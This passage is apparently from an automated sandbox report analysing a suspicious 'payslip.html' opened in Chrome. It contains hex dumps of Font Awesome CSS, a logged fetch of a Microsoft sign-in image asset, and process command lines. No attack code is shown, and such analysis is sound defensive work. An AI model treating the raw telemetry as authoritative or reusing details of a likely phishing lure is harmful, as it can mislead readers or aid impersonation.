                                              Data Ascii: left:before { content: "\f10d";}.fa-quote-right:before { content: "\f10e";}.fa-spinner:before { content: "\f110";}.fa-circle:before { content: "\f111";}.fa-mail-reply:before,.fa-reply:before { content: "\f112";}.fa-github-alt:before {
                                              2023-09-05 23:45:30 UTC896INData Raw: 73 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 32 64 22 3b 0a 7d 0a 2e 66 61 2d 70 75 7a 7a 6c 65 2d 70 69 65 63 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 32 65 22 3b 0a 7d 0a 2e 66 61 2d 6d 69 63 72 6f 70 68 6f 6e 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 33 30 22 3b 0a 7d 0a 2e 66 61 2d 6d 69 63 72 6f 70 68 6f 6e 65 2d 73 6c 61 73 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 33 31 22 3b 0a 7d 0a 2e 66 61 2d 73 68 69 65 6c 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 33 32 22 3b 0a 7d 0a 2e 66 61 2d 63 61 6c 65 6e 64 61 72 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e
                                              Data Ascii: ser:before { content: "\f12d";}.fa-puzzle-piece:before { content: "\f12e";}.fa-microphone:before { content: "\f130";}.fa-microphone-slash:before { content: "\f131";}.fa-shield:before { content: "\f132";}.fa-calendar-o:before { conten
                                              2023-09-05 23:45:30 UTC897INData Raw: 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 34 63 22 3b 0a 7d 0a 2e 66 61 2d 73 68 61 72 65 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 34 64 22 3b 0a 7d 0a 2e 66 61 2d 63 6f 6d 70 61 73 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 34 65 22 3b 0a 7d 0a 2e 66 61 2d 74 6f 67 67 6c 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 63 61 72 65 74 2d 73 71 75 61 72 65 2d 6f 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 35 30 22 3b 0a 7d 0a 2e 66 61 2d 74 6f 67 67 6c 65 2d 75 70 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 63 61 72 65 74 2d 73 71 75 61 72 65 2d 6f 2d 75 70 3a 62 65 66 6f
                                              Data Ascii: quare:before { content: "\f14c";}.fa-share-square:before { content: "\f14d";}.fa-compass:before { content: "\f14e";}.fa-toggle-down:before,.fa-caret-square-o-down:before { content: "\f150";}.fa-toggle-up:before,.fa-caret-square-o-up:befo
                                              2023-09-05 23:45:30 UTC898INData Raw: 74 65 6e 74 3a 20 22 5c 66 31 36 36 22 3b 0a 7d 0a 2e 66 61 2d 79 6f 75 74 75 62 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 36 37 22 3b 0a 7d 0a 2e 66 61 2d 78 69 6e 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 36 38 22 3b 0a 7d 0a 2e 66 61 2d 78 69 6e 67 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 36 39 22 3b 0a 7d 0a 2e 66 61 2d 79 6f 75 74 75 62 65 2d 70 6c 61 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 36 61 22 3b 0a 7d 0a 2e 66 61 2d 64 72 6f 70 62 6f 78 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 36 62 22 3b 0a 7d 0a 2e 66 61 2d 73 74 61 63 6b 2d 6f 76 65 72 66 6c 6f
                                              Data Ascii: tent: "\f166";}.fa-youtube:before { content: "\f167";}.fa-xing:before { content: "\f168";}.fa-xing-square:before { content: "\f169";}.fa-youtube-play:before { content: "\f16a";}.fa-dropbox:before { content: "\f16b";}.fa-stack-overflo
                                              2023-09-05 23:45:30 UTC900INData Raw: 22 3b 0a 7d 0a 2e 66 61 2d 61 72 63 68 69 76 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 38 37 22 3b 0a 7d 0a 2e 66 61 2d 62 75 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 38 38 22 3b 0a 7d 0a 2e 66 61 2d 76 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 38 39 22 3b 0a 7d 0a 2e 66 61 2d 77 65 69 62 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 38 61 22 3b 0a 7d 0a 2e 66 61 2d 72 65 6e 72 65 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 38 62 22 3b 0a 7d 0a 2e 66 61 2d 70 61 67 65 6c 69 6e 65 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 38 63 22 3b 0a 7d 0a 2e 66
                                              Data Ascii: ";}.fa-archive:before { content: "\f187";}.fa-bug:before { content: "\f188";}.fa-vk:before { content: "\f189";}.fa-weibo:before { content: "\f18a";}.fa-renren:before { content: "\f18b";}.fa-pagelines:before { content: "\f18c";}.f
                                              2023-09-05 23:45:30 UTC901INData Raw: 2d 73 74 75 6d 62 6c 65 75 70 6f 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 34 22 3b 0a 7d 0a 2e 66 61 2d 64 65 6c 69 63 69 6f 75 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 35 22 3b 0a 7d 0a 2e 66 61 2d 64 69 67 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 36 22 3b 0a 7d 0a 2e 66 61 2d 70 69 65 64 2d 70 69 70 65 72 2d 70 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 37 22 3b 0a 7d 0a 2e 66 61 2d 70 69 65 64 2d 70 69 70 65 72 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 38 22 3b 0a 7d 0a 2e 66 61 2d 64 72 75 70 61 6c 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65
                                              Data Ascii: -stumbleupon:before { content: "\f1a4";}.fa-delicious:before { content: "\f1a5";}.fa-digg:before { content: "\f1a6";}.fa-pied-piper-pp:before { content: "\f1a7";}.fa-pied-piper-alt:before { content: "\f1a8";}.fa-drupal:before { conte
                                              2023-09-05 23:45:30 UTC903INData Raw: 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 63 34 22 3b 0a 7d 0a 2e 66 61 2d 66 69 6c 65 2d 70 68 6f 74 6f 2d 6f 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 66 69 6c 65 2d 70 69 63 74 75 72 65 2d 6f 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 66 69 6c 65 2d 69 6d 61 67 65 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 63 35 22 3b 0a 7d 0a 2e 66 61 2d 66 69 6c 65 2d 7a 69 70 2d 6f 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 66 69 6c 65 2d 61 72 63 68 69 76 65 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 63 36 22 3b 0a 7d 0a 2e 66 61 2d 66 69 6c 65 2d 73 6f 75 6e 64 2d 6f 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 66 69 6c 65 2d 61 75 64 69 6f 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63
                                              Data Ascii: ore { content: "\f1c4";}.fa-file-photo-o:before,.fa-file-picture-o:before,.fa-file-image-o:before { content: "\f1c5";}.fa-file-zip-o:before,.fa-file-archive-o:before { content: "\f1c6";}.fa-file-sound-o:before,.fa-file-audio-o:before { c
                                              2023-09-05 23:45:30 UTC904INData Raw: 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 64 62 22 3b 0a 7d 0a 2e 66 61 2d 68 65 61 64 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 64 63 22 3b 0a 7d 0a 2e 66 61 2d 70 61 72 61 67 72 61 70 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 64 64 22 3b 0a 7d 0a 2e 66 61 2d 73 6c 69 64 65 72 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 64 65 22 3b 0a 7d 0a 2e 66 61 2d 73 68 61 72 65 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 65 30 22 3b 0a 7d 0a 2e 66 61 2d 73 68 61 72 65 2d 61 6c 74 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 65 31 22 3b 0a 7d 0a 2e 66
                                              Data Ascii: e { content: "\f1db";}.fa-header:before { content: "\f1dc";}.fa-paragraph:before { content: "\f1dd";}.fa-sliders:before { content: "\f1de";}.fa-share-alt:before { content: "\f1e0";}.fa-share-alt-square:before { content: "\f1e1";}.f
                                              2023-09-05 23:45:30 UTC905INData Raw: 66 62 22 3b 0a 7d 0a 2e 66 61 2d 70 61 69 6e 74 2d 62 72 75 73 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 66 63 22 3b 0a 7d 0a 2e 66 61 2d 62 69 72 74 68 64 61 79 2d 63 61 6b 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 66 64 22 3b 0a 7d 0a 2e 66 61 2d 61 72 65 61 2d 63 68 61 72 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 66 65 22 3b 0a 7d 0a 2e 66 61 2d 70 69 65 2d 63 68 61 72 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 30 30 22 3b 0a 7d 0a 2e 66 61 2d 6c 69 6e 65 2d 63 68 61 72 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 30 31 22 3b 0a 7d 0a 2e 66 61 2d 6c 61 73 74 66 6d 3a 62 65 66 6f
                                              Data Ascii: fb";}.fa-paint-brush:before { content: "\f1fc";}.fa-birthday-cake:before { content: "\f1fd";}.fa-area-chart:before { content: "\f1fe";}.fa-pie-chart:before { content: "\f200";}.fa-line-chart:before { content: "\f201";}.fa-lastfm:befo
                                              2023-09-05 23:45:30 UTC907INData Raw: 65 6e 74 3a 20 22 5c 66 32 31 62 22 3b 0a 7d 0a 2e 66 61 2d 6d 6f 74 6f 72 63 79 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 31 63 22 3b 0a 7d 0a 2e 66 61 2d 73 74 72 65 65 74 2d 76 69 65 77 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 31 64 22 3b 0a 7d 0a 2e 66 61 2d 68 65 61 72 74 62 65 61 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 31 65 22 3b 0a 7d 0a 2e 66 61 2d 76 65 6e 75 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 32 31 22 3b 0a 7d 0a 2e 66 61 2d 6d 61 72 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 32 32 22 3b 0a 7d 0a 2e 66 61 2d 6d 65 72 63 75 72 79 3a 62 65 66 6f 72 65 20 7b
                                              Data Ascii: ent: "\f21b";}.fa-motorcycle:before { content: "\f21c";}.fa-street-view:before { content: "\f21d";}.fa-heartbeat:before { content: "\f21e";}.fa-venus:before { content: "\f221";}.fa-mars:before { content: "\f222";}.fa-mercury:before {
                                              2023-09-05 23:45:30 UTC908INData Raw: 65 6e 74 3a 20 22 5c 66 32 33 63 22 3b 0a 7d 0a 2e 66 61 2d 6f 70 65 6e 63 61 72 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 33 64 22 3b 0a 7d 0a 2e 66 61 2d 65 78 70 65 64 69 74 65 64 73 73 6c 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 33 65 22 3b 0a 7d 0a 2e 66 61 2d 62 61 74 74 65 72 79 2d 34 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 62 61 74 74 65 72 79 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 62 61 74 74 65 72 79 2d 66 75 6c 6c 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 34 30 22 3b 0a 7d 0a 2e 66 61 2d 62 61 74 74 65 72 79 2d 33 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 62 61 74 74 65 72 79 2d 74 68 72 65 65 2d 71 75 61 72 74 65 72 73 3a 62 65 66 6f 72 65 20 7b
                                              Data Ascii: ent: "\f23c";}.fa-opencart:before { content: "\f23d";}.fa-expeditedssl:before { content: "\f23e";}.fa-battery-4:before,.fa-battery:before,.fa-battery-full:before { content: "\f240";}.fa-battery-3:before,.fa-battery-three-quarters:before {
                                              2023-09-05 23:45:30 UTC909INData Raw: 0a 2e 66 61 2d 68 61 6e 64 2d 70 61 70 65 72 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 35 36 22 3b 0a 7d 0a 2e 66 61 2d 68 61 6e 64 2d 73 63 69 73 73 6f 72 73 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 35 37 22 3b 0a 7d 0a 2e 66 61 2d 68 61 6e 64 2d 6c 69 7a 61 72 64 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 35 38 22 3b 0a 7d 0a 2e 66 61 2d 68 61 6e 64 2d 73 70 6f 63 6b 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 35 39 22 3b 0a 7d 0a 2e 66 61 2d 68 61 6e 64 2d 70 6f 69 6e 74 65 72 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 35 61 22 3b 0a 7d 0a 2e 66 61 2d 68 61 6e 64
                                              Data Ascii: .fa-hand-paper-o:before { content: "\f256";}.fa-hand-scissors-o:before { content: "\f257";}.fa-hand-lizard-o:before { content: "\f258";}.fa-hand-spock-o:before { content: "\f259";}.fa-hand-pointer-o:before { content: "\f25a";}.fa-hand
                                              2023-09-05 23:45:30 UTC910INData Raw: 31 36 31 32 0d 0a 63 61 6c 65 6e 64 61 72 2d 6d 69 6e 75 73 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 37 32 22 3b 0a 7d 0a 2e 66 61 2d 63 61 6c 65 6e 64 61 72 2d 74 69 6d 65 73 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 37 33 22 3b 0a 7d 0a 2e 66 61 2d 63 61 6c 65 6e 64 61 72 2d 63 68 65 63 6b 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 37 34 22 3b 0a 7d 0a 2e 66 61 2d 69 6e 64 75 73 74 72 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 37 35 22 3b 0a 7d 0a 2e 66 61 2d 6d 61 70 2d 70 69 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 37 36 22 3b 0a 7d 0a 2e 66 61 2d 6d 61 70 2d 73 69
                                              Data Ascii: 1612calendar-minus-o:before { content: "\f272";}.fa-calendar-times-o:before { content: "\f273";}.fa-calendar-check-o:before { content: "\f274";}.fa-industry:before { content: "\f275";}.fa-map-pin:before { content: "\f276";}.fa-map-si
                                              2023-09-05 23:45:30 UTC912INData Raw: 3b 0a 7d 0a 2e 66 61 2d 68 61 73 68 74 61 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 39 32 22 3b 0a 7d 0a 2e 66 61 2d 62 6c 75 65 74 6f 6f 74 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 39 33 22 3b 0a 7d 0a 2e 66 61 2d 62 6c 75 65 74 6f 6f 74 68 2d 62 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 39 34 22 3b 0a 7d 0a 2e 66 61 2d 70 65 72 63 65 6e 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 39 35 22 3b 0a 7d 0a 2e 66 61 2d 67 69 74 6c 61 62 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 39 36 22 3b 0a 7d 0a 2e 66 61 2d 77 70 62 65 67 69 6e 6e 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65
                                              Data Ascii: ;}.fa-hashtag:before { content: "\f292";}.fa-bluetooth:before { content: "\f293";}.fa-bluetooth-b:before { content: "\f294";}.fa-percent:before { content: "\f295";}.fa-gitlab:before { content: "\f296";}.fa-wpbeginner:before { conte
                                              2023-09-05 23:45:30 UTC913INData Raw: 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 61 64 22 3b 0a 7d 0a 2e 66 61 2d 70 69 65 64 2d 70 69 70 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 61 65 22 3b 0a 7d 0a 2e 66 61 2d 66 69 72 73 74 2d 6f 72 64 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 62 30 22 3b 0a 7d 0a 2e 66 61 2d 79 6f 61 73 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 62 31 22 3b 0a 7d 0a 2e 66 61 2d 74 68 65 6d 65 69 73 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 62 32 22 3b 0a 7d 0a 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 2d 6f 66 66 69 63 69 61 6c
                                              Data Ascii: content: "\f2ad";}.fa-pied-piper:before { content: "\f2ae";}.fa-first-order:before { content: "\f2b0";}.fa-yoast:before { content: "\f2b1";}.fa-themeisle:before { content: "\f2b2";}.fa-google-plus-circle:before,.fa-google-plus-official
                                              2023-09-05 23:45:30 UTC914INData Raw: 68 65 72 6d 6f 6d 65 74 65 72 2d 74 68 72 65 65 2d 71 75 61 72 74 65 72 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 63 38 22 3b 0a 7d 0a 2e 66 61 2d 74 68 65 72 6d 6f 6d 65 74 65 72 2d 32 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 74 68 65 72 6d 6f 6d 65 74 65 72 2d 68 61 6c 66 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 63 39 22 3b 0a 7d 0a 2e 66 61 2d 74 68 65 72 6d 6f 6d 65 74 65 72 2d 31 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 74 68 65 72 6d 6f 6d 65 74 65 72 2d 71 75 61 72 74 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 32 63 61 22 3b 0a 7d 0a 2e 66 61 2d 74 68 65 72 6d 6f 6d 65 74 65 72 2d 30 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 74 68 65 72 6d 6f 6d 65 74
                                              Data Ascii: hermometer-three-quarters:before { content: "\f2c8";}.fa-thermometer-2:before,.fa-thermometer-half:before { content: "\f2c9";}.fa-thermometer-1:before,.fa-thermometer-quarter:before { content: "\f2ca";}.fa-thermometer-0:before,.fa-thermomet
                                              2023-09-05 23:45:30 UTC916INData Raw: 30 2c 20 30 2c 20 30 29 3b 0a 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 2e 73 72 2d 6f 6e 6c 79 2d 66 6f 63 75 73 61 62 6c 65 3a 61 63 74 69 76 65 2c 0a 2e 73 72 2d 6f 6e 6c 79 2d 66 6f 63 75 73 61 62 6c 65 3a 66 6f 63 75 73 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 73 74 61 74 69 63 3b 0a 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 76 69 73 69 62 6c 65 3b 0a 20 20 63 6c 69 70 3a 20 61 75 74 6f 3b 0a 7d 0a 0d 0a
                                              Data Ascii: 0, 0, 0); border: 0;}.sr-only-focusable:active,.sr-only-focusable:focus { position: static; width: auto; height: auto; margin: 0; overflow: visible; clip: auto;}
                                              2023-09-05 23:45:30 UTC916INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              9192.168.2.44974013.107.213.69443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:30 UTC916OUTGET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1
                                              Host: aadcdn.msauth.net
                                              Connection: keep-alive
                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:30 UTC918INHTTP/1.1 200 OK
                                              Cache-Control: public, max-age=31536000
                                              Content-Length: 1173
                                              Content-Type: image/svg+xml
                                              Content-Encoding: gzip
                                              Content-MD5: XHrPYKKsqlxUvysuxtSE2A==
                                              Last-Modified: Fri, 17 Jan 2020 19:28:39 GMT
                                              ETag: 0x8D79B83749623C9
                                              X-Cache: TCP_HIT
                                              x-ms-request-id: 309f99ac-801e-0027-34f4-df774e000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              Access-Control-Allow-Origin: *
                                              X-Azure-Ref-OriginShield: 0WIH3ZAAAAADjNkbcMEZMQpFtNKWHRiIkU0pDRURHRTA1MTcAMzlhMTJmN2UtODk5Zi00NmNmLWE2ZDAtMjRiYmJhMjdkOTU2
                                              X-Azure-Ref: 0mr33ZAAAAADDyGpxlVh0QLPTDp224RdDTEFYMzExMDAwMTA4MDMxADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                              Date: Tue, 05 Sep 2023 23:45:29 GMT
                                              Connection: close
                                              2023-09-05 23:45:30 UTC919INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 56 cb 6e 24 37 0c fc 95 c1 e4 da ad 69 52 d4 2b b0 0d 4c 4e 39 ac 6f 41 0e b9 35 b2 b3 1e 03 8e bd b3 6e 78 f6 f3 53 14 a5 de 6c dc 86 dd 25 5b d4 83 2a 16 29 dd bc be 3d ec be ff f3 f4 fc 7a bb 3f 2f cb d7 5f 0f 87 eb f5 ea ae de bd 7c 7b 38 f0 34 4d 07 8c d8 ef ae 8f 9f 97 f3 ed 5e f2 7e 77 3e 3d 3e 9c 17 fb fb ed f1 74 fd ed e5 fb ed 7e da 4d 3b c9 f8 dd df dd 2c 8f cb d3 e9 6e 7e 7d 3d 2d af 37 07 fb ef e6 db e9 ef e5 a3 55 be 3c 3e 3d dd ee 9f 5f 9e 4f fb c3 dd cd d7 79 39 ef 3e df ee ef fd e4 84 79 e0 e2 a6 c2 b3 77 52 fc 60 38 e1 87 06 72 9e c5 71 24 f4 fa dc b1 db c8 b3 4b 52 2e ce c7 58 bf cc c9 a5 14 16 57 a4 b8 1c e4 e2 24 67 27 22 e8 20 57 3c cf c5 95 24 83 a1 2d e3 32 95 81 8e 18 12 68 30 34 83 4f 83 17 97 7c
                                              Data Ascii: uVn$7iR+LN9oA5nxSl%[*)=z?/_|{84M^~w>=>t~M;,n~}=-7U<>=_Oy9>ywR`8rq$KR.XW$g'" W<$-2h04O|


                                              050100s020406080100

                                              Click to jump to process

                                              050100s0.0020406080100MB

                                              Click to jump to process

                                              Target ID:0
                                              Start time:01:45:18
                                              Start date:06/09/2023
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\payslip.html
                                              Imagebase:0x7ff6a8a00000
                                              File size:2'852'640 bytes
                                              MD5 hash:7BC7B4AEDC055BB02BCB52710132E9E1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:1
                                              Start time:01:45:20
                                              Start date:06/09/2023
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1780,i,17506270214673181647,1305193494310523666,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                              Imagebase:0x7ff6a8a00000
                                              File size:2'852'640 bytes
                                              MD5 hash:7BC7B4AEDC055BB02BCB52710132E9E1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:24
                                              Start time:01:46:41
                                              Start date:06/09/2023
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
